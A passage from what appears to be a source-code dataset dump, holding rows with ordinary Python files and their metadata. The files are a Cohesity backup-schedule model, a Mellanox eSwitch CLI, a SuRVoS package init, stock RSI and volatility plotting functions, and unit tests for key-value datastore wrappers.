monthly_schedule,
periodicity,
rpo_schedule)
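
# Minimal usage sketch (illustrative only, not part of the generated SDK file):
# build the model from an API-style dictionary. Only the flat 'periodicity' key
# is exercised here, so nothing is assumed about the nested schedule payloads.
if __name__ == '__main__':
    _example = SchedulingPolicy.from_dictionary({'periodicity': 'kDaily'})
    print(_example.periodicity)  # -> kDaily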
| # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule) | en | 0.781499 | # -*- coding: utf-8 -*- # Copyright 2019 Cohesity Inc. Implementation of the 'SchedulingPolicy' model. Specifies settings that define a backup schedule for a Protection Job. Attributes: continuous_schedule (ContinuousSchedule): Specifies the time interval between two Job Runs of a continuous backup schedule and any blackout periods when new Job Runs should NOT be started. Set if periodicity is kContinuous. daily_schedule (DailySchedule): Specifies a daily or weekly backup schedule. Set if periodicity is kDaily. monthly_schedule (MonthlySchedule): Specifies a monthly backup schedule. Set if periodicity is kMonthly. periodicity (PeriodicityEnum): Specifies how often to start new Job Runs of a Protection Job. 'kDaily' means new Job Runs start daily. 'kMonthly' means new Job Runs start monthly. 'kContinuous' means new Job Runs repetitively start at the beginning of the specified time interval (in hours or minutes). 'kContinuousRPO' means this is an RPO schedule. rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if periodicity is kContinuousRPO. # Create a mapping from Model property names to API property names Constructor for the SchedulingPolicy class # Initialize members of the class Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class. # Extract variables from the dictionary # Return an object of this model | 2.668455 | 3 |
networking_mlnx/eswitchd/cli/ebrctl.py | mail2nsrajesh/networking-mlnx | 0 | 9145 | #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
    The actions that are supported through the CLI are:
    write-sys, del-port, allocate-port and add-port.
    Each action is matched with the method that handles it,
    e.g. the write-sys action is matched with the write_sys method.
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
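# Illustrative invocations (sketch only; the argument order follows the parsers
# above and the angle-bracket values are placeholders, not real devices):
#   ebrctl allocate-port <vnic_mac> <device_id> <fabric> <vnic_type>
#   ebrctl add-port <vnic_mac> <device_id> <fabric> <vnic_type> <dev_name>
#   ebrctl del-port <fabric> <vnic_mac>
#   ebrctl write-sys <path> <value>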
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| #!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
    The actions that are supported through the CLI are:
    write-sys, del-port, allocate-port and add-port.
    Each action is matched with the method that handles it,
    e.g. the write-sys action is matched with the write_sys method.
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| en | 0.884169 | #!/usr/bin/python # Copyright 2013 Mellanox Technologies, Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. Main method that manages supported CLI commands. The actions that are supported throught the CLI are: write-sys, del-port, allocate-port and add-port Each action is matched with method that should handle it e.g. write-sys action is matched with write_sys method | 2.167085 | 2 |
survos/core/__init__.py | paskino/SuRVoS | 22 | 9146 |
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
|
from .launcher import Launcher
from .model import DataModel
from .layers import LayerManager
from .labels import LabelManager
from .singleton import Singleton
| none | 1 | 1.140908 | 1 |
|
src/FinanceLib/analysis.py | Chahat-M/FinanceLib | 3 | 9147 | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol: str, name: str, date: str) -> None:
"""
    Calculates and visualises the Relative Strength Index (RSI) of a company's stock.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
    ticker: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    delta: pd.Series = ticker['Close'].diff()
    up: pd.Series = delta.clip(lower=0)
    down: pd.Series = -1*delta.clip(upper=0)
    # Exponential moving averages of gains and losses (com=13 gives a 14-period RSI)
    ema_up: pd.Series = up.ewm(com=13, adjust=False).mean()
    ema_down: pd.Series = down.ewm(com=13, adjust=False).mean()
    rs: pd.Series = ema_up/ema_down
    ticker['RSI'] = 100 - (100/(1 + rs))
    ticker = ticker.iloc[14:]  # drop the 14-day warm-up period
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
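# A minimal sketch (not part of the original module) of the same RSI computation,
# returning the indicator series instead of plotting it. It assumes `close` is a
# pandas Series of closing prices; the smoothing mirrors rsi() above.
def rsi_series(close: pd.Series, period: int = 14) -> pd.Series:
    delta = close.diff()
    gains = delta.clip(lower=0)
    losses = -1 * delta.clip(upper=0)
    ema_up = gains.ewm(com=period - 1, adjust=False).mean()
    ema_down = losses.ewm(com=period - 1, adjust=False).mean()
    rs = ema_up / ema_down
    return (100 - 100 / (1 + rs)).iloc[period:]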
def volatility(symbol: str, date: str) -> None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
    data: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    # True range: the largest of high-low, |high - prev close| and |low - prev close|
    high_low: pd.Series = data['High'] - data['Low']
    high_cp: pd.Series = np.abs(data['High'] - data['Close'].shift())
    low_cp: pd.Series = np.abs(data['Low'] - data['Close'].shift())
    df: pd.DataFrame = pd.concat([high_low, high_cp, low_cp], axis=1)
    true_range: pd.Series = np.max(df, axis=1)
    # ATR: 14-period rolling mean of the true range
    average_true_range: pd.Series = true_range.rolling(14).mean()
    fig, ax = plt.subplots()
    average_true_range.plot(ax=ax)
    ax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol: str, name: str, date: str) -> None:
"""
    Calculates and visualises the Relative Strength Index (RSI) of a company's stock.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
    ticker: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    delta: pd.Series = ticker['Close'].diff()
    up: pd.Series = delta.clip(lower=0)
    down: pd.Series = -1*delta.clip(upper=0)
    # Exponential moving averages of gains and losses (com=13 gives a 14-period RSI)
    ema_up: pd.Series = up.ewm(com=13, adjust=False).mean()
    ema_down: pd.Series = down.ewm(com=13, adjust=False).mean()
    rs: pd.Series = ema_up/ema_down
    ticker['RSI'] = 100 - (100/(1 + rs))
    ticker = ticker.iloc[14:]  # drop the 14-day warm-up period
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol: str, date: str) -> None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
    data: pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    # True range: the largest of high-low, |high - prev close| and |low - prev close|
    high_low: pd.Series = data['High'] - data['Low']
    high_cp: pd.Series = np.abs(data['High'] - data['Close'].shift())
    low_cp: pd.Series = np.abs(data['Low'] - data['Close'].shift())
    df: pd.DataFrame = pd.concat([high_low, high_cp, low_cp], axis=1)
    true_range: pd.Series = np.max(df, axis=1)
    # ATR: 14-period rolling mean of the true range
    average_true_range: pd.Series = true_range.rolling(14).mean()
    fig, ax = plt.subplots()
    average_true_range.plot(ax=ax)
    ax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | en | 0.571534 | Calculates and visualises the Relative Stock Index on a Stock of the company. Parameters: symbol(str) : Symbol of the company from https://in.finance.yahoo.com/ name(str) : Name of the company date(str) : start date of historical data in the format (YYYY,M,D) Returns: Return type: void Example: rsi('GOOG','Google','2020,01,01') Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR) Parameters: symbol(str) : Symbol of the company from https://in.finance.yahoo.com/ date(str) : start date of historical data in the format (YYYY,M,D) Returns: Return type: void Example: volatility('GOOG','2020,01,01') | 3.367381 | 3 |
datastore/core/test/test_basic.py | jbenet/datastore | 1 | 9148 |
import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
def checkLength(len):
try:
for sn in stores:
self.assertEqual(len(sn), numelems)
except TypeError, e:
pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
    # make sure the cache is not relied upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
